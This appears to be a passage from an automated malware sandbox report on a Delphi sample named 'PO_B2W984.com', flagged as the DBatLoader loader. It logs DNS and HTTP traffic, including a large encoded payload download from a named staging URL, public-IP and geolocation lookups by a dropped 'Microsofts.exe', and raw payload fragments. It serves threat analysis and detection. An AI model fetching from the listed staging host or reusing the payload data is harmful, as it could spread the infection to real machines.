                                                                                                                                      Jan 3, 2025 02:48:54.859441042 CET4974880192.168.11.20132.226.8.169
                                                                                                                                      Jan 3, 2025 02:48:55.157519102 CET8049748132.226.8.169192.168.11.20

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Jan 3, 2025 02:47:06.125754118 CET5893653192.168.11.201.1.1.1
                                                                                                                                      Jan 3, 2025 02:47:07.132394075 CET5893653192.168.11.209.9.9.9
                                                                                                                                      Jan 3, 2025 02:47:07.773242950 CET53589369.9.9.9192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:08.025278091 CET53589361.1.1.1192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:13.575953007 CET6121553192.168.11.209.9.9.9
                                                                                                                                      Jan 3, 2025 02:47:13.705705881 CET53612159.9.9.9192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:14.842277050 CET6262753192.168.11.209.9.9.9
                                                                                                                                      Jan 3, 2025 02:47:14.976592064 CET53626279.9.9.9192.168.11.20

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Jan 3, 2025 02:47:06.125754118 CET192.168.11.201.1.1.10x2eb8Standard query (0)lwaziacademy.comA (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:07.132394075 CET192.168.11.209.9.9.90x2eb8Standard query (0)lwaziacademy.comA (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:13.575953007 CET192.168.11.209.9.9.90x369aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:14.842277050 CET192.168.11.209.9.9.90x3a6aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Jan 3, 2025 02:47:07.773242950 CET9.9.9.9192.168.11.200x2eb8No error (0)lwaziacademy.com41.185.8.252A (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:08.025278091 CET1.1.1.1192.168.11.200x2eb8No error (0)lwaziacademy.com41.185.8.252A (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:13.705705881 CET9.9.9.9192.168.11.200x369aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:13.705705881 CET9.9.9.9192.168.11.200x369aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:13.705705881 CET9.9.9.9192.168.11.200x369aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:13.705705881 CET9.9.9.9192.168.11.200x369aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:13.705705881 CET9.9.9.9192.168.11.200x369aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:13.705705881 CET9.9.9.9192.168.11.200x369aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:14.976592064 CET9.9.9.9192.168.11.200x3a6aNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                      Jan 3, 2025 02:47:14.976592064 CET9.9.9.9192.168.11.200x3a6aNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • lwaziacademy.com
                                                                                                                                      • reallyfreegeoip.org
                                                                                                                                      • checkip.dyndns.org

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.11.2049748132.226.8.169804824C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 3, 2025 02:47:14.010780096 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Jan 3, 2025 02:47:14.515010118 CET276INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 03 Jan 2025 01:47:14 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 107
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.153.238</body></html>
                                                                                                                                      Jan 3, 2025 02:47:14.518706083 CET127OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Jan 3, 2025 02:47:14.839919090 CET276INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 03 Jan 2025 01:47:14 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 107
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.153.238</body></html>


                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.11.204974741.185.8.2524435980C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2025-01-03 01:47:08 UTC169OUTGET /wps/200_Oupzhkprnvw HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                      Host: lwaziacademy.com
                                                                                                                                      2025-01-03 01:47:09 UTC183INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 03 Jan 2025 01:47:09 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Last-Modified: Fri, 20 Dec 2024 10:43:30 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 906612
                                                                                                                                      Connection: close
                                                                                                                                      2025-01-03 01:47:09 UTC8009INData Raw: 68 59 32 45 4f 41 4b 47 6b 43 72 2f 2f 76 72 74 2f 41 62 33 2f 41 54 74 41 66 54 74 39 51 55 43 38 50 66 74 37 76 30 41 41 50 54 76 2f 66 73 44 38 2f 66 74 2b 66 50 39 2b 76 6f 45 38 76 54 35 41 2f 48 75 2f 50 49 45 42 66 6b 46 39 77 62 76 39 41 62 31 2b 77 51 46 2f 76 44 76 41 4f 33 31 39 66 6a 7a 42 76 76 35 2b 75 2f 79 2f 66 44 34 2f 66 34 47 38 66 4c 30 41 76 62 30 37 2f 37 35 2b 34 57 4e 68 44 67 43 68 70 41 71 4f 51 48 38 42 76 54 33 2f 50 37 36 41 67 4f 46 6a 59 51 34 41 6f 61 51 4b 72 2b 37 70 70 65 49 7a 63 58 56 79 74 48 43 71 4d 54 44 7a 72 7a 4f 31 4a 2b 61 68 39 66 51 76 63 2f 42 32 4b 33 4b 78 63 62 56 79 37 36 6d 6a 6f 44 4a 78 4d 4b 37 7a 63 75 77 79 64 54 4f 31 63 6e 55 75 70 6d 51 7a 63 50 41 79 73 6d 37 6e 4d 62 51 78 74 6e 5a 32 5a 32
                                                                                                                                      Data Ascii: hY2EOAKGkCr//vrt/Ab3/ATtAfTt9QUC8Pft7v0AAPTv/fsD8/ft+fP9+voE8vT5A/Hu/PIEBfkF9wbv9Ab1+wQF/vDvAO319fjzBvv5+u/y/fD4/f4G8fL0Avb07/75+4WNhDgChpAqOQH8BvT3/P76AgOFjYQ4AoaQKr+7ppeIzcXVytHCqMTDzrzO1J+ah9fQvc/B2K3KxcbVy76mjoDJxMK7zcuwydTO1cnUupmQzcPAysm7nMbQxtnZ2Z2
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 44 50 45 30 65 58 68 69 68 62 73 73 35 53 50 68 72 45 45 32 44 68 2f 74 4b 51 62 37 30 39 6e 75 75 74 2b 43 4c 4d 53 6c 79 57 43 4e 4d 43 45 42 71 49 47 6c 75 4a 71 6b 78 6e 59 37 4d 6a 30 4c 34 6e 68 2f 78 45 34 6f 4d 76 38 74 5a 4c 79 72 5a 77 71 31 48 67 52 74 4f 70 6e 6f 42 2f 39 57 4b 42 34 4b 35 71 56 33 37 54 72 70 59 75 35 7a 51 55 32 4d 5a 74 62 2f 6b 36 42 32 37 52 56 54 55 43 6a 38 61 5a 64 69 61 4d 32 6b 4e 59 48 42 67 44 37 50 38 41 68 45 51 32 76 57 57 6f 71 66 30 6b 37 57 59 50 2b 54 57 37 64 39 39 68 77 61 54 4d 72 74 68 63 45 75 48 58 42 58 54 6f 32 66 65 6c 6c 4a 4b 66 51 33 34 6f 30 47 67 6b 2b 37 48 57 30 53 50 6c 5a 70 6a 32 65 33 45 65 31 59 66 6e 2f 69 55 6c 35 59 64 74 52 48 4e 4e 7a 63 53 45 62 58 47 39 33 70 70 41 54 78 53 57 41
                                                                                                                                      Data Ascii: DPE0eXhihbss5SPhrEE2Dh/tKQb709nuut+CLMSlyWCNMCEBqIGluJqkxnY7Mj0L4nh/xE4oMv8tZLyrZwq1HgRtOpnoB/9WKB4K5qV37TrpYu5zQU2MZtb/k6B27RVTUCj8aZdiaM2kNYHBgD7P8AhEQ2vWWoqf0k7WYP+TW7d99hwaTMrthcEuHXBXTo2fellJKfQ34o0Ggk+7HW0SPlZpj2e3Ee1Yfn/iUl5YdtRHNNzcSEbXG93ppATxSWA
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 6e 36 6f 6a 6f 59 71 46 67 63 38 54 34 45 45 6d 36 6b 5a 65 2b 45 4c 58 4a 32 71 49 34 52 2b 70 6a 51 57 45 67 57 7a 6f 2f 36 31 4d 36 33 48 68 75 59 78 58 55 61 31 47 76 7a 55 51 38 46 45 30 42 42 6e 2f 74 59 61 61 52 47 41 71 4d 35 74 69 34 67 67 77 78 61 63 68 74 48 67 33 70 55 6f 52 38 36 31 73 48 55 64 68 79 39 33 6e 78 57 6a 58 64 58 7a 77 2f 52 57 63 49 42 50 68 48 43 6a 6b 61 4d 4b 52 46 56 55 63 42 46 4f 4a 7a 6d 72 73 77 6b 73 7a 64 39 4c 4b 5a 31 77 79 69 48 4e 49 7a 30 37 70 58 6e 4d 30 6b 38 6e 52 69 6c 7a 61 6d 33 63 33 4f 42 56 79 57 47 51 42 69 37 79 54 6f 78 77 65 45 53 79 65 78 66 74 6f 33 6f 43 2f 66 61 4c 44 4e 6a 30 6a 46 43 4b 36 2b 64 6d 75 70 55 37 4c 2f 56 50 6b 4c 2f 54 31 42 61 30 4e 5a 75 33 61 59 52 52 2b 35 6d 53 38 44 6b 65
                                                                                                                                      Data Ascii: n6ojoYqFgc8T4EEm6kZe+ELXJ2qI4R+pjQWEgWzo/61M63HhuYxXUa1GvzUQ8FE0BBn/tYaaRGAqM5ti4ggwxachtHg3pUoR861sHUdhy93nxWjXdXzw/RWcIBPhHCjkaMKRFVUcBFOJzmrswkszd9LKZ1wyiHNIz07pXnM0k8nRilzam3c3OBVyWGQBi7yToxweESyexfto3oC/faLDNj0jFCK6+dmupU7L/VPkL/T1Ba0NZu3aYRR+5mS8Dke
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 61 36 5a 31 78 65 4b 75 6d 31 68 30 45 48 61 2b 6c 51 73 6a 64 70 71 37 4e 47 54 2f 58 74 2f 75 48 6a 4e 49 65 38 56 66 62 32 48 67 48 71 31 58 36 32 32 53 72 4d 4e 52 2b 39 66 59 78 54 6d 66 46 66 69 4b 64 37 52 68 46 74 41 67 68 6f 7a 76 56 59 59 69 63 2f 4f 51 63 71 78 44 79 50 34 67 76 4a 77 37 76 47 55 35 57 52 30 61 6c 39 69 4b 4f 33 51 69 4d 6c 44 6f 5a 36 64 79 37 42 4c 77 78 75 78 48 63 57 78 79 4d 45 30 4e 68 47 6f 4b 72 72 38 4c 34 2b 63 39 6c 67 71 30 72 49 34 7a 35 75 2b 58 51 57 59 77 55 57 30 4b 6c 49 77 6f 44 45 34 6a 39 48 6d 79 58 6e 38 68 71 49 66 4c 2b 73 38 45 53 34 67 6b 63 54 4b 65 54 35 77 34 4d 48 57 48 76 4d 59 68 57 43 41 4b 41 74 74 2f 2f 6b 4c 7a 42 7a 2f 6b 34 6c 4a 31 6c 36 59 2f 73 64 42 79 4d 6e 57 53 32 35 5a 65 33 50 55
                                                                                                                                      Data Ascii: a6Z1xeKum1h0EHa+lQsjdpq7NGT/Xt/uHjNIe8Vfb2HgHq1X622SrMNR+9fYxTmfFfiKd7RhFtAghozvVYYic/OQcqxDyP4gvJw7vGU5WR0al9iKO3QiMlDoZ6dy7BLwxuxHcWxyME0NhGoKrr8L4+c9lgq0rI4z5u+XQWYwUW0KlIwoDE4j9HmyXn8hqIfL+s8ES4gkcTKeT5w4MHWHvMYhWCAKAtt//kLzBz/k4lJ1l6Y/sdByMnWS25Ze3PU
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 4b 78 47 37 4a 66 67 4d 48 55 76 73 51 5a 71 6c 6e 45 42 67 63 75 71 65 73 69 6a 4b 6a 6e 67 55 65 37 78 33 4e 35 6c 77 6c 73 69 50 6e 65 4b 54 57 74 65 49 66 4b 43 2f 52 73 78 62 42 69 77 4e 45 65 4e 61 54 6b 42 4d 70 59 58 69 50 37 47 30 2f 46 67 53 49 34 6e 41 66 73 4e 64 39 69 70 30 75 62 74 42 72 61 6f 6d 67 4c 72 61 43 5a 33 54 34 65 5a 6d 43 71 44 5a 2f 6b 63 73 6e 75 66 36 74 6d 48 61 61 54 61 38 4c 45 55 70 52 6d 4e 6b 39 43 6b 37 4c 2b 72 4c 55 7a 35 4d 50 66 42 51 37 43 56 6f 64 77 75 4a 4d 68 44 75 4e 34 7a 4a 4c 5a 7a 54 56 38 44 46 59 70 48 44 33 67 74 6b 48 78 4e 42 55 57 30 32 56 6e 78 68 41 79 46 74 42 71 62 34 50 55 4c 36 53 77 66 46 30 45 78 71 6b 34 69 64 4a 48 31 6f 4e 6c 75 6b 79 41 54 54 32 41 55 53 33 33 67 31 36 75 7a 35 4f 5a 39
                                                                                                                                      Data Ascii: KxG7JfgMHUvsQZqlnEBgcuqesijKjngUe7x3N5lwlsiPneKTWteIfKC/RsxbBiwNEeNaTkBMpYXiP7G0/FgSI4nAfsNd9ip0ubtBraomgLraCZ3T4eZmCqDZ/kcsnuf6tmHaaTa8LEUpRmNk9Ck7L+rLUz5MPfBQ7CVodwuJMhDuN4zJLZzTV8DFYpHD3gtkHxNBUW02VnxhAyFtBqb4PUL6SwfF0Exqk4idJH1oNlukyATT2AUS33g16uz5OZ9
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 70 39 67 32 58 44 4e 47 53 48 55 4a 78 38 43 2b 72 73 69 43 6f 43 31 54 2b 31 54 79 36 6b 72 57 58 4e 42 49 4e 63 6a 41 49 6f 30 56 6d 68 6a 39 37 70 72 47 33 4e 66 44 36 4e 79 36 55 41 53 4e 52 33 44 51 6f 6d 4e 68 39 71 6b 54 62 66 58 2f 79 4d 46 65 73 6c 6c 39 2f 45 4f 7a 32 54 44 58 48 66 58 54 77 6e 69 79 33 4d 6b 4b 6c 50 64 46 31 61 43 79 54 64 55 43 7a 6e 54 6b 63 4c 31 30 6e 72 71 48 36 51 62 65 78 79 2f 71 75 43 74 55 4b 69 63 4a 44 6d 4f 53 75 6d 31 6f 6a 4b 72 48 73 71 43 58 4d 32 4d 2b 53 2f 62 33 53 75 62 2f 56 56 76 7a 79 75 67 63 64 6e 4c 6c 2b 72 77 74 37 42 4d 57 5a 58 69 43 57 66 76 61 4b 79 49 64 31 51 4b 51 61 5a 4f 71 4a 2f 57 7a 4b 79 6f 2b 67 63 74 4b 68 70 53 77 49 34 36 55 6b 5a 67 77 77 77 35 55 69 6a 57 6e 35 41 70 6d 75 4b 45
                                                                                                                                      Data Ascii: p9g2XDNGSHUJx8C+rsiCoC1T+1Ty6krWXNBINcjAIo0Vmhj97prG3NfD6Ny6UASNR3DQomNh9qkTbfX/yMFesll9/EOz2TDXHfXTwniy3MkKlPdF1aCyTdUCznTkcL10nrqH6Qbexy/quCtUKicJDmOSum1ojKrHsqCXM2M+S/b3Sub/VVvzyugcdnLl+rwt7BMWZXiCWfvaKyId1QKQaZOqJ/WzKyo+gctKhpSwI46UkZgwww5UijWn5ApmuKE
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 59 6b 70 67 78 4b 4d 6f 68 4a 41 6f 5a 45 37 6c 6e 2b 50 76 50 4b 4f 65 56 72 54 4f 43 58 62 6d 77 76 57 47 61 38 32 45 61 41 74 72 57 65 71 64 6e 41 75 72 32 72 6a 66 79 64 52 76 76 70 6c 79 7a 32 50 39 4d 58 4c 35 58 33 66 2b 31 48 54 51 47 6c 39 73 31 44 41 45 5a 6c 6a 62 72 54 71 53 30 72 73 4a 30 50 69 4a 4d 59 6a 69 73 79 49 6b 4b 74 6f 58 63 5a 2b 50 45 4b 54 32 58 70 32 6b 36 50 53 2f 70 6b 42 66 45 38 7a 59 6f 47 74 34 67 58 48 75 6e 6a 30 4c 43 7a 51 39 76 34 68 33 2b 37 42 54 63 43 39 4f 59 76 6b 76 6c 38 42 4a 45 6d 48 38 74 56 4c 4f 79 46 6c 51 51 70 68 39 4d 4c 6a 67 54 51 65 49 71 78 71 31 65 51 31 79 41 43 6d 50 64 38 70 69 70 33 47 6b 49 34 6d 65 7a 4a 64 72 77 73 34 6c 31 39 36 6d 58 4d 70 52 69 75 2b 61 52 2f 6d 76 73 32 61 6f 6b 35 6c
                                                                                                                                      Data Ascii: YkpgxKMohJAoZE7ln+PvPKOeVrTOCXbmwvWGa82EaAtrWeqdnAur2rjfydRvvplyz2P9MXL5X3f+1HTQGl9s1DAEZljbrTqS0rsJ0PiJMYjisyIkKtoXcZ+PEKT2Xp2k6PS/pkBfE8zYoGt4gXHunj0LCzQ9v4h3+7BTcC9OYvkvl8BJEmH8tVLOyFlQQph9MLjgTQeIqxq1eQ1yACmPd8pip3GkI4mezJdrws4l196mXMpRiu+aR/mvs2aok5l
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 4a 52 44 75 52 33 66 61 6a 65 34 76 35 71 42 2f 70 62 37 43 62 77 4a 48 42 72 57 35 53 56 6c 73 4f 6c 2f 56 7a 30 54 53 50 42 56 33 75 41 47 6f 79 39 4a 75 54 66 74 48 2f 49 32 5a 55 53 62 5a 56 51 65 71 34 4b 35 7a 51 62 36 65 4e 6c 7a 32 72 32 58 5a 73 44 56 6e 4f 2f 35 69 71 35 70 77 33 32 78 68 6b 4f 42 75 68 56 76 6e 51 6e 59 4d 77 56 6e 6a 46 2b 2b 51 6b 34 4a 6c 61 43 6c 69 6e 6e 77 65 49 33 5a 50 67 2b 48 53 6c 67 52 46 52 71 7a 76 57 45 74 33 2b 46 33 76 6a 56 44 37 53 2b 2b 73 2b 33 2b 44 69 73 42 31 51 71 36 44 6e 6d 39 6b 37 4a 58 30 69 53 75 38 5a 4d 4d 79 73 42 78 78 4e 48 7a 38 4f 72 6a 35 65 4b 44 59 58 2f 4f 77 74 78 6d 33 6e 50 6b 70 5a 6c 53 49 76 70 41 53 39 73 38 42 30 37 4a 62 5a 33 72 73 56 58 36 6d 39 4b 6a 36 46 6c 54 5a 32 67 4c
                                                                                                                                      Data Ascii: JRDuR3faje4v5qB/pb7CbwJHBrW5SVlsOl/Vz0TSPBV3uAGoy9JuTftH/I2ZUSbZVQeq4K5zQb6eNlz2r2XZsDVnO/5iq5pw32xhkOBuhVvnQnYMwVnjF++Qk4JlaClinnweI3ZPg+HSlgRFRqzvWEt3+F3vjVD7S++s+3+DisB1Qq6Dnm9k7JX0iSu8ZMMysBxxNHz8Orj5eKDYX/Owtxm3nPkpZlSIvpAS9s8B07JbZ3rsVX6m9Kj6FlTZ2gL
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 79 50 69 34 33 75 55 39 6c 56 41 6f 54 35 34 56 64 54 4e 69 73 30 37 54 42 52 35 69 45 66 46 68 34 74 44 54 75 74 73 36 72 69 34 79 79 57 6c 6d 72 2b 4a 35 58 39 65 75 65 31 58 4a 4d 37 56 57 46 48 75 72 51 55 4c 74 4a 53 4a 66 57 65 5a 5a 47 5a 76 38 65 2f 53 77 48 4f 6b 73 6d 67 78 43 52 79 77 52 36 6b 4d 50 42 64 61 32 45 74 56 79 6a 72 71 30 53 6d 52 56 68 52 43 33 35 59 54 64 56 32 2f 55 49 4b 59 67 4a 66 45 6b 68 53 34 57 30 7a 70 77 76 46 66 45 4d 65 48 51 49 4e 6d 66 73 37 6d 6f 76 4d 4a 47 4a 47 31 45 32 78 66 68 71 6f 42 70 6d 37 48 35 56 42 58 6a 38 44 37 35 68 43 36 4d 6e 4b 4a 33 35 56 79 4d 6b 77 61 73 62 71 30 4d 4f 52 70 6a 45 74 49 65 64 56 53 30 45 74 30 71 39 71 6d 78 6b 57 58 6a 52 45 76 5a 79 72 6b 2b 45 64 65 32 65 30 68 78 79 4b 2f
                                                                                                                                      Data Ascii: yPi43uU9lVAoT54VdTNis07TBR5iEfFh4tDTuts6ri4yyWlmr+J5X9eue1XJM7VWFHurQULtJSJfWeZZGZv8e/SwHOksmgxCRywR6kMPBda2EtVyjrq0SmRVhRC35YTdV2/UIKYgJfEkhS4W0zpwvFfEMeHQINmfs7movMJGJG1E2xfhqoBpm7H5VBXj8D75hC6MnKJ35VyMkwasbq0MORpjEtIedVS0Et0q9qmxkWXjREvZyrk+Ede2e0hxyK/
                                                                                                                                      2025-01-03 01:47:09 UTC8000INData Raw: 58 65 34 51 64 2f 69 2b 65 64 63 2f 59 69 6a 6e 46 4a 56 4d 49 67 32 59 32 4d 46 5a 57 55 70 63 4f 77 59 75 45 74 62 56 48 49 4e 71 7a 32 6d 34 66 6f 79 79 41 4e 2f 70 75 6f 35 66 55 68 41 57 42 59 51 79 6e 78 4f 4c 33 43 45 77 57 79 62 4b 61 4c 45 49 49 34 4a 32 55 52 79 6b 55 38 2b 4f 77 30 71 6a 55 62 4b 58 71 77 5a 79 65 57 4b 53 44 6f 47 79 56 51 6d 52 45 58 72 4c 36 7a 62 67 52 57 4a 77 46 39 75 61 4e 2b 58 61 38 30 6d 71 48 53 35 75 39 68 77 70 31 47 79 4d 41 30 51 39 37 45 67 4c 4c 41 38 79 48 56 59 44 4f 70 68 6b 35 4a 5a 4e 65 4b 55 44 67 63 4d 33 4f 39 71 76 5a 49 58 32 43 54 36 75 4f 6d 57 37 4f 51 7a 5a 46 6a 6e 30 30 30 4d 48 38 79 74 76 43 38 66 35 32 44 6f 75 30 61 62 79 57 4f 54 78 63 6a 67 6e 48 51 52 6f 64 4e 71 68 5a 47 33 54 61 34 43
                                                                                                                                      Data Ascii: Xe4Qd/i+edc/YijnFJVMIg2Y2MFZWUpcOwYuEtbVHINqz2m4foyyAN/puo5fUhAWBYQynxOL3CEwWybKaLEII4J2URykU8+Ow0qjUbKXqwZyeWKSDoGyVQmREXrL6zbgRWJwF9uaN+Xa80mqHS5u9hwp1GyMA0Q97EgLLA8yHVYDOphk5JZNeKUDgcM3O9qvZIX2CT6uOmW7OQzZFjn000MH8ytvC8f52Dou0abyWOTxcjgnHQRodNqhZG3Ta4C


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.11.2049749104.21.67.1524434824C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2025-01-03 01:47:15 UTC88OUTGET /xml/102.129.153.238 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2025-01-03 01:47:15 UTC868INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 03 Jan 2025 01:47:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 361
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                      Last-Modified: Fri, 03 Jan 2025 01:47:15 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLH7TLQvRotXoZ7dDugG2zlT0PvTudIJshsDMNQ4dBVZb3nqZznAVRNZXGow3%2FEQls4rczxMDrkA0qBXoHW6VHalqJbnNqZzk2nmGytFnMZRHvgoTJV%2BbM7FW9Zrhj6pdmCR%2B0jp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8fbf51ddcc2f6c87-MIA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129041&min_rtt=128914&rtt_var=27308&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=702&delivery_rate=29643&cwnd=252&unsent_bytes=0&cid=a741716c3c17800e&ts=705&x=0"
                                                                                                                                      2025-01-03 01:47:15 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 46 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 46 6c 6f 72 69 64 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4d 69 61 6d 69 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 33 33 31 39 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                      Data Ascii: <Response><IP>102.129.153.238</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>FL</RegionCode><RegionName>Florida</RegionName><City>Miami</City><ZipCode>33197</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:20:47:04
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\PO_B2W984.com"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:2'145'792 bytes
                                                                                                                                      MD5 hash:F7D9FFE252E26320F26A76FC3F239C50
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.22895700001.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
